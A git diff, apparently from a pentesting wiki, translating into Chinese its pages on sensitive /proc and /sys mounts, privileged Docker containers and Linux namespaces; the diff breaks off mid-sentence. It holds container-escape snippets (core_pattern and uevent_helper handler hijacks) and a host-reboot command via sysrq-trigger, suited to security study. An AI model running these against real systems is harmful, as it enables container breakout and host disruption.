+暴露 `/proc` 和 `/sys` 而没有适当的命名空间隔离会引入重大安全风险,包括攻击面扩大和信息泄露。这些目录包含敏感文件,如果配置错误或被未经授权的用户访问,可能导致容器逃逸、主机修改或提供有助于进一步攻击的信息。例如,错误地挂载 `-v /proc:/host/proc` 可能会由于其基于路径的特性绕过 AppArmor 保护,使得 `/host/proc` 没有保护。 -{% embed url="https://websec.nl/" %} +**您可以在** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)** 中找到每个潜在漏洞的更多详细信息。** -The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected. - -**You can find further details of each potential vuln in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.** - -## procfs Vulnerabilities +## procfs 漏洞 ### `/proc/sys` -This directory permits access to modify kernel variables, usually via `sysctl(2)`, and contains several subdirectories of concern: +该目录允许访问以修改内核变量,通常通过 `sysctl(2)`,并包含几个关注的子目录: #### **`/proc/sys/kernel/core_pattern`** -- Described in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html). -- Allows defining a program to execute on core-file generation with the first 128 bytes as arguments. This can lead to code execution if the file begins with a pipe `|`. -- **Testing and Exploitation Example**: +- 在 [core(5)](https://man7.org/linux/man-pages/man5/core.5.html) 中描述。 +- 允许定义在核心文件生成时执行的程序,前 128 字节作为参数。如果文件以管道 `|` 开头,可能导致代码执行。 +- **测试和利用示例**: - ```bash - [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access - cd /proc/sys/kernel - echo "|$overlay/shell.sh" > core_pattern # Set custom handler - sleep 5 && ./crash & # Trigger handler - ``` +```bash +[ -w /proc/sys/kernel/core_pattern ] && echo Yes # 测试写入访问 +cd /proc/sys/kernel +echo "|$overlay/shell.sh" > core_pattern # 设置自定义处理程序 +sleep 5 && ./crash & # 触发处理程序 +``` #### **`/proc/sys/kernel/modprobe`** -- Detailed in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). -- Contains the path to the kernel module loader, invoked for loading kernel modules. -- **Checking Access Example**: +- 在 [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html) 中详细说明。 +- 包含内核模块加载器的路径,用于加载内核模块。 +- **检查访问示例**: - ```bash - ls -l $(cat /proc/sys/kernel/modprobe) # Check access to modprobe - ``` +```bash +ls -l $(cat /proc/sys/kernel/modprobe) # 检查对 modprobe 的访问 +``` #### **`/proc/sys/vm/panic_on_oom`** -- Referenced in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). -- A global flag that controls whether the kernel panics or invokes the OOM killer when an OOM condition occurs. +- 在 [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html) 中引用。 +- 一个全局标志,控制内核在发生 OOM 条件时是否崩溃或调用 OOM 杀手。 #### **`/proc/sys/fs`** -- As per [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), contains options and information about the file system. -- Write access can enable various denial-of-service attacks against the host. +- 根据 [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html),包含有关文件系统的选项和信息。 +- 写入访问可能会启用对主机的各种拒绝服务攻击。 #### **`/proc/sys/fs/binfmt_misc`** -- Allows registering interpreters for non-native binary formats based on their magic number. -- Can lead to privilege escalation or root shell access if `/proc/sys/fs/binfmt_misc/register` is writable. -- Relevant exploit and explanation: - - [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) - - In-depth tutorial: [Video link](https://www.youtube.com/watch?v=WBC7hhgMvQQ) +- 允许根据其魔数注册非本地二进制格式的解释器。 +- 如果 `/proc/sys/fs/binfmt_misc/register` 可写,可能导致特权升级或 root shell 访问。 +- 相关利用和解释: +- [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc) +- 深入教程:[视频链接](https://www.youtube.com/watch?v=WBC7hhgMvQQ) -### Others in `/proc` +### `/proc` 中的其他内容 #### **`/proc/config.gz`** -- May reveal the kernel configuration if `CONFIG_IKCONFIG_PROC` is enabled. -- Useful for attackers to identify vulnerabilities in the running kernel. +- 如果启用了 `CONFIG_IKCONFIG_PROC`,可能会泄露内核配置。 +- 对攻击者识别运行内核中的漏洞非常有用。 #### **`/proc/sysrq-trigger`** -- Allows invoking Sysrq commands, potentially causing immediate system reboots or other critical actions. -- **Rebooting Host Example**: +- 允许调用 Sysrq 命令,可能导致立即重启系统或其他关键操作。 +- **重启主机示例**: - ```bash - echo b > /proc/sysrq-trigger # Reboots the host - ``` +```bash +echo b > /proc/sysrq-trigger # 重启主机 +``` #### **`/proc/kmsg`** -- Exposes kernel ring buffer messages. -- Can aid in kernel exploits, address leaks, and provide sensitive system information. +- 暴露内核环形缓冲区消息。 +- 可以帮助进行内核利用、地址泄露,并提供敏感系统信息。 #### **`/proc/kallsyms`** -- Lists kernel exported symbols and their addresses. -- Essential for kernel exploit development, especially for overcoming KASLR. -- Address information is restricted with `kptr_restrict` set to `1` or `2`. -- Details in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- 列出内核导出的符号及其地址。 +- 对于内核利用开发至关重要,特别是克服 KASLR。 +- 地址信息在 `kptr_restrict` 设置为 `1` 或 `2` 时受到限制。 +- 详细信息见 [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html)。 #### **`/proc/[pid]/mem`** -- Interfaces with the kernel memory device `/dev/mem`. -- Historically vulnerable to privilege escalation attacks. -- More on [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html). +- 与内核内存设备 `/dev/mem` 交互。 +- 历史上容易受到特权升级攻击。 +- 更多信息见 [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html)。 #### **`/proc/kcore`** -- Represents the system's physical memory in ELF core format. -- Reading can leak host system and other containers' memory contents. -- Large file size can lead to reading issues or software crashes. -- Detailed usage in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/). +- 以 ELF 核心格式表示系统的物理内存。 +- 读取可能会泄露主机系统和其他容器的内存内容。 +- 大文件大小可能导致读取问题或软件崩溃。 +- 详细用法见 [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/)。 #### **`/proc/kmem`** -- Alternate interface for `/dev/kmem`, representing kernel virtual memory. -- Allows reading and writing, hence direct modification of kernel memory. +- `/dev/kmem` 的替代接口,表示内核虚拟内存。 +- 允许读取和写入,因此可以直接修改内核内存。 #### **`/proc/mem`** -- Alternate interface for `/dev/mem`, representing physical memory. -- Allows reading and writing, modification of all memory requires resolving virtual to physical addresses. +- `/dev/mem` 的替代接口,表示物理内存。 +- 允许读取和写入,修改所有内存需要解析虚拟地址到物理地址。 #### **`/proc/sched_debug`** -- Returns process scheduling information, bypassing PID namespace protections. -- Exposes process names, IDs, and cgroup identifiers. +- 返回进程调度信息,绕过 PID 命名空间保护。 +- 暴露进程名称、ID 和 cgroup 标识符。 #### **`/proc/[pid]/mountinfo`** -- Provides information about mount points in the process's mount namespace. -- Exposes the location of the container `rootfs` or image. +- 提供有关进程挂载命名空间中挂载点的信息。 +- 暴露容器 `rootfs` 或映像的位置。 -### `/sys` Vulnerabilities +### `/sys` 漏洞 #### **`/sys/kernel/uevent_helper`** -- Used for handling kernel device `uevents`. -- Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers. -- **Example for Exploitation**: %%%bash +- 用于处理内核设备 `uevents`。 +- 写入 `/sys/kernel/uevent_helper` 可以在 `uevent` 触发时执行任意脚本。 +- **利用示例**: %%%bash - #### Creates a payload +#### 创建有效负载 - echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper +echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper - #### Finds host path from OverlayFS mount for container +#### 从 OverlayFS 挂载中查找主机路径 - host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab) +host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab) - #### Sets uevent_helper to malicious helper +#### 将 uevent_helper 设置为恶意助手 - echo "$host_path/evil-helper" > /sys/kernel/uevent_helper +echo "$host_path/evil-helper" > /sys/kernel/uevent_helper - #### Triggers a uevent +#### 触发 uevent - echo change > /sys/class/mem/null/uevent +echo change > /sys/class/mem/null/uevent - #### Reads the output +#### 读取输出 - cat /output %%% +cat /output %%% #### **`/sys/class/thermal`** -- Controls temperature settings, potentially causing DoS attacks or physical damage. +- 控制温度设置,可能导致 DoS 攻击或物理损坏。 #### **`/sys/kernel/vmcoreinfo`** -- Leaks kernel addresses, potentially compromising KASLR. +- 泄露内核地址,可能危及 KASLR。 #### **`/sys/kernel/security`** -- Houses `securityfs` interface, allowing configuration of Linux Security Modules like AppArmor. -- Access might enable a container to disable its MAC system. +- 存放 `securityfs` 接口,允许配置 Linux 安全模块,如 AppArmor。 +- 访问可能使容器能够禁用其 MAC 系统。 -#### **`/sys/firmware/efi/vars` and `/sys/firmware/efi/efivars`** +#### **`/sys/firmware/efi/vars` 和 `/sys/firmware/efi/efivars`** -- Exposes interfaces for interacting with EFI variables in NVRAM. -- Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines. +- 暴露与 NVRAM 中的 EFI 变量交互的接口。 +- 配置错误或利用可能导致笔记本电脑砖化或主机无法启动。 #### **`/sys/kernel/debug`** -- `debugfs` offers a "no rules" debugging interface to the kernel. -- History of security issues due to its unrestricted nature. +- `debugfs` 提供了一个“无规则”的内核调试接口。 +- 由于其不受限制的特性,历史上存在安全问题。 -### References +### 参考文献 - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts) -- [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf) -- [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf) - -
- -{% embed url="https://websec.nl/" %} +- [理解和强化 Linux 容器](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf) +- [滥用特权和非特权 Linux 容器](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf) {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index ce967ad2d..bf4c7a21f 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -2,28 +2,25 @@ {{#include ../../../banners/hacktricks-training.md}} -## What Affects +## 影响 -When you run a container as privileged these are the protections you are disabling: +当你以特权模式运行容器时,你正在禁用以下保护: -### Mount /dev +### 挂载 /dev -In a privileged container, all the **devices can be accessed in `/dev/`**. Therefore you can **escape** by **mounting** the disk of the host. +在特权容器中,所有的 **设备可以在 `/dev/` 中访问**。因此,你可以通过 **挂载** 主机的磁盘来 **逃逸**。 {{#tabs}} {{#tab name="Inside default container"}} - ```bash # docker run --rm -it alpine sh ls /dev console fd mqueue ptmx random stderr stdout urandom core full null pts shm stdin tty zero ``` - {{#endtab}} -{{#tab name="Inside Privileged Container"}} - +{{#tab name="内部特权容器"}} ```bash # docker run --rm --privileged -it alpine sh ls /dev @@ -33,17 +30,15 @@ core mqueue ptmx stdin tty26 cpu nbd0 pts stdout tty27 tty47 ttyS0 [...] ``` - {{#endtab}} {{#endtabs}} -### Read-only kernel file systems +### 只读内核文件系统 -Kernel file systems provide a mechanism for a process to modify the behavior of the kernel. However, when it comes to container processes, we want to prevent them from making any changes to the kernel. Therefore, we mount kernel file systems as **read-only** within the container, ensuring that the container processes cannot modify the kernel. +内核文件系统为进程提供了一种修改内核行为的机制。然而,对于容器进程,我们希望防止它们对内核进行任何更改。因此,我们在容器内将内核文件系统挂载为**只读**,确保容器进程无法修改内核。 {{#tabs}} {{#tab name="Inside default container"}} - ```bash # docker run --rm -it alpine sh mount | grep '(ro' @@ -52,28 +47,24 @@ cpuset on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpu cpu on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu) cpuacct on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpuacct) ``` - {{#endtab}} -{{#tab name="Inside Privileged Container"}} - +{{#tab name="内部特权容器"}} ```bash # docker run --rm --privileged -it alpine sh mount | grep '(ro' ``` - {{#endtab}} {{#endtabs}} -### Masking over kernel file systems +### 遮蔽内核文件系统 -The **/proc** file system is selectively writable but for security, certain parts are shielded from write and read access by overlaying them with **tmpfs**, ensuring container processes can't access sensitive areas. +**/proc** 文件系统是选择性可写的,但出于安全考虑,某些部分通过覆盖 **tmpfs** 进行保护,确保容器进程无法访问敏感区域。 -> [!NOTE] > **tmpfs** is a file system that stores all the files in virtual memory. tmpfs doesn't create any files on your hard drive. So if you unmount a tmpfs file system, all the files residing in it are lost for ever. +> [!NOTE] > **tmpfs** 是一个将所有文件存储在虚拟内存中的文件系统。tmpfs 不会在你的硬盘上创建任何文件。因此,如果你卸载一个 tmpfs 文件系统,里面的所有文件将永远丢失。 {{#tabs}} {{#tab name="Inside default container"}} - ```bash # docker run --rm -it alpine sh mount | grep /proc.*tmpfs @@ -81,22 +72,19 @@ tmpfs on /proc/acpi type tmpfs (ro,relatime) tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755) tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755) ``` - {{#endtab}} -{{#tab name="Inside Privileged Container"}} - +{{#tab name="内部特权容器"}} ```bash # docker run --rm --privileged -it alpine sh mount | grep /proc.*tmpfs ``` - {{#endtab}} {{#endtabs}} -### Linux capabilities +### Linux 能力 -Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read: +容器引擎以 **有限数量的能力** 启动容器,以控制默认情况下容器内部发生的事情。 **特权** 容器具有 **所有** 可访问的 **能力**。要了解能力,请阅读: {{#ref}} ../linux-capabilities.md @@ -104,7 +92,6 @@ Container engines launch the containers with a **limited number of capabilities* {{#tabs}} {{#tab name="Inside default container"}} - ```bash # docker run --rm -it alpine sh apk add -U libcap; capsh --print @@ -113,11 +100,9 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap [...] ``` - {{#endtab}} {{#tab name="Inside Privileged Container"}} - ```bash # docker run --rm --privileged -it alpine sh apk add -U libcap; capsh --print @@ -126,15 +111,14 @@ Current: =eip cap_perfmon,cap_bpf,cap_checkpoint_restore-eip Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read [...] ``` - {{#endtab}} {{#endtabs}} -You can manipulate the capabilities available to a container without running in `--privileged` mode by using the `--cap-add` and `--cap-drop` flags. +您可以通过使用 `--cap-add` 和 `--cap-drop` 标志来操控容器可用的能力,而无需以 `--privileged` 模式运行。 ### Seccomp -**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here: +**Seccomp** 对于 **限制** 容器可以调用的 **syscalls** 非常有用。默认情况下,在运行 docker 容器时启用默认的 seccomp 配置文件,但在特权模式下它是禁用的。有关 Seccomp 的更多信息,请查看: {{#ref}} seccomp.md @@ -142,100 +126,86 @@ seccomp.md {{#tabs}} {{#tab name="Inside default container"}} - ```bash # docker run --rm -it alpine sh grep Seccomp /proc/1/status Seccomp: 2 Seccomp_filters: 1 ``` - {{#endtab}} {{#tab name="Inside Privileged Container"}} - ```bash # docker run --rm --privileged -it alpine sh grep Seccomp /proc/1/status Seccomp: 0 Seccomp_filters: 0 ``` - {{#endtab}} {{#endtabs}} - ```bash # You can manually disable seccomp in docker with --security-opt seccomp=unconfined ``` - -Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster, the **seccomp filter is disabled by default** +另外,请注意,当在 **Kubernetes** 集群中使用 Docker(或其他 CRI)时,**seccomp 过滤器默认是禁用的**。 ### AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. +**AppArmor** 是一种内核增强,用于将 **容器** 限制在 **有限** 的 **资源** 集合中,具有 **每个程序的配置文件**。当您使用 `--privileged` 标志运行时,此保护将被禁用。 {{#ref}} apparmor.md {{#endref}} - ```bash # You can manually disable seccomp in docker with --security-opt apparmor=unconfined ``` - ### SELinux -Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied. +运行带有 `--privileged` 标志的容器会禁用 **SELinux 标签**,使其继承容器引擎的标签,通常为 `unconfined`,授予与容器引擎相似的完全访问权限。在无根模式下,它使用 `container_runtime_t`,而在根模式下,应用 `spc_t`。 {{#ref}} ../selinux.md {{#endref}} - ```bash # You can manually disable selinux in docker with --security-opt label:disable ``` +## 什么不受影响 -## What Doesn't Affect +### 命名空间 -### Namespaces - -Namespaces are **NOT affected** by the `--privileged` flag. Even though they don't have the security constraints enabled, they **do not see all of the processes on the system or the host network, for example**. Users can disable individual namespaces by using the **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** container engines flags. +命名空间**不受**`--privileged`标志的影响。尽管它们没有启用安全约束,但它们**并不能看到系统或主机网络上的所有进程,例如**。用户可以通过使用**`--pid=host`、`--net=host`、`--ipc=host`、`--uts=host`**容器引擎标志来禁用单个命名空间。 {{#tabs}} {{#tab name="Inside default privileged container"}} - ```bash # docker run --rm --privileged -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:00 sh - 18 root 0:00 ps -ef +1 root 0:00 sh +18 root 0:00 ps -ef ``` - {{#endtab}} -{{#tab name="Inside --pid=host Container"}} - +{{#tab name="内部 --pid=host 容器"}} ```bash # docker run --rm --privileged --pid=host -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:03 /sbin/init - 2 root 0:00 [kthreadd] - 3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs +1 root 0:03 /sbin/init +2 root 0:00 [kthreadd] +3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs [...] ``` - {{#endtab}} {{#endtabs}} -### User namespace +### 用户命名空间 -**By default, container engines don't utilize user namespaces, except for rootless containers**, which require them for file system mounting and using multiple UIDs. User namespaces, integral for rootless containers, cannot be disabled and significantly enhance security by restricting privileges. +**默认情况下,容器引擎不使用用户命名空间,除了无根容器**,无根容器需要它们进行文件系统挂载和使用多个 UID。用户命名空间对于无根容器至关重要,无法禁用,并通过限制特权显著增强安全性。 -## References +## 参考 - [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines) diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 6df879add..27bf84e87 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -1,44 +1,44 @@ -# Namespaces +# 名称空间 {{#include ../../../../banners/hacktricks-training.md}} -### **PID namespace** +### **PID 名称空间** {{#ref}} pid-namespace.md {{#endref}} -### **Mount namespace** +### **挂载名称空间** {{#ref}} mount-namespace.md {{#endref}} -### **Network namespace** +### **网络名称空间** {{#ref}} network-namespace.md {{#endref}} -### **IPC Namespace** +### **IPC 名称空间** {{#ref}} ipc-namespace.md {{#endref}} -### **UTS namespace** +### **UTS 名称空间** {{#ref}} uts-namespace.md {{#endref}} -### Time Namespace +### 时间名称空间 {{#ref}} time-namespace.md {{#endref}} -### User namespace +### 用户名称空间 {{#ref}} user-namespace.md diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index d7f4c2d65..5d81705ba 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -2,90 +2,80 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A cgroup namespace is a Linux kernel feature that provides **isolation of cgroup hierarchies for processes running within a namespace**. Cgroups, short for **control groups**, are a kernel feature that allows organizing processes into hierarchical groups to manage and enforce **limits on system resources** like CPU, memory, and I/O. +cgroup 命名空间是一个 Linux 内核特性,提供 **在命名空间内运行的进程的 cgroup 层次结构的隔离**。Cgroups,简称 **控制组**,是一个内核特性,允许将进程组织成层次组,以管理和强制 **系统资源的限制**,如 CPU、内存和 I/O。 -While cgroup namespaces are not a separate namespace type like the others we discussed earlier (PID, mount, network, etc.), they are related to the concept of namespace isolation. **Cgroup namespaces virtualize the view of the cgroup hierarchy**, so that processes running within a cgroup namespace have a different view of the hierarchy compared to processes running in the host or other namespaces. +虽然 cgroup 命名空间不是我们之前讨论的其他命名空间类型(PID、挂载、网络等),但它们与命名空间隔离的概念相关。**Cgroup 命名空间虚拟化了 cgroup 层次结构的视图**,因此在 cgroup 命名空间内运行的进程与在主机或其他命名空间中运行的进程相比,具有不同的层次结构视图。 -### How it works: +### 工作原理: -1. When a new cgroup namespace is created, **it starts with a view of the cgroup hierarchy based on the cgroup of the creating process**. This means that processes running in the new cgroup namespace will only see a subset of the entire cgroup hierarchy, limited to the cgroup subtree rooted at the creating process's cgroup. -2. Processes within a cgroup namespace will **see their own cgroup as the root of the hierarchy**. This means that, from the perspective of processes inside the namespace, their own cgroup appears as the root, and they cannot see or access cgroups outside of their own subtree. -3. Cgroup namespaces do not directly provide isolation of resources; **they only provide isolation of the cgroup hierarchy view**. **Resource control and isolation are still enforced by the cgroup** subsystems (e.g., cpu, memory, etc.) themselves. +1. 当创建一个新的 cgroup 命名空间时,**它以创建进程的 cgroup 为基础,开始查看 cgroup 层次结构**。这意味着在新的 cgroup 命名空间中运行的进程将仅看到整个 cgroup 层次结构的一个子集,限制在以创建进程的 cgroup 为根的 cgroup 子树内。 +2. 在 cgroup 命名空间内的进程将 **将自己的 cgroup 视为层次结构的根**。这意味着,从命名空间内进程的角度来看,它们自己的 cgroup 显示为根,并且它们无法看到或访问其自身子树之外的 cgroups。 +3. Cgroup 命名空间并不直接提供资源的隔离;**它们仅提供 cgroup 层次结构视图的隔离**。**资源控制和隔离仍然由 cgroup** 子系统(例如,cpu、内存等)本身强制执行。 -For more information about CGroups check: +有关 CGroups 的更多信息,请查看: {{#ref}} ../cgroups.md {{#endref}} -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -C [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统实例,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有**特定于该命名空间的进程信息的准确和隔离视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题解释**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为“unshare”进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生“无法分配内存”的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。然后,`/bin/bash` 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行,而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/cgroup lrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> 'cgroup:[4026531835]' ``` - -### Find all CGroup namespaces - +### 查找所有 CGroup 命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name cgroup -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside an CGroup namespace - +### 进入 CGroup 命名空间 ```bash nsenter -C TARGET_PID --pid /bin/bash ``` +此外,您只能**以 root 身份进入另一个进程命名空间**。并且您**不能**在没有指向它的**描述符**的情况下**进入**其他命名空间(如 `/proc/self/ns/cgroup`)。 -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/cgroup`). - -## References +## 参考 - [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md index 14b23338a..57de563fc 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md @@ -2,83 +2,72 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -An IPC (Inter-Process Communication) namespace is a Linux kernel feature that provides **isolation** of System V IPC objects, such as message queues, shared memory segments, and semaphores. This isolation ensures that processes in **different IPC namespaces cannot directly access or modify each other's IPC objects**, providing an additional layer of security and privacy between process groups. +IPC(进程间通信)命名空间是一个Linux内核特性,提供**隔离**System V IPC对象,如消息队列、共享内存段和信号量。此隔离确保**不同IPC命名空间中的进程无法直接访问或修改彼此的IPC对象**,为进程组之间提供额外的安全性和隐私保护。 -### How it works: +### 工作原理: -1. When a new IPC namespace is created, it starts with a **completely isolated set of System V IPC objects**. This means that processes running in the new IPC namespace cannot access or interfere with the IPC objects in other namespaces or the host system by default. -2. IPC objects created within a namespace are visible and **accessible only to processes within that 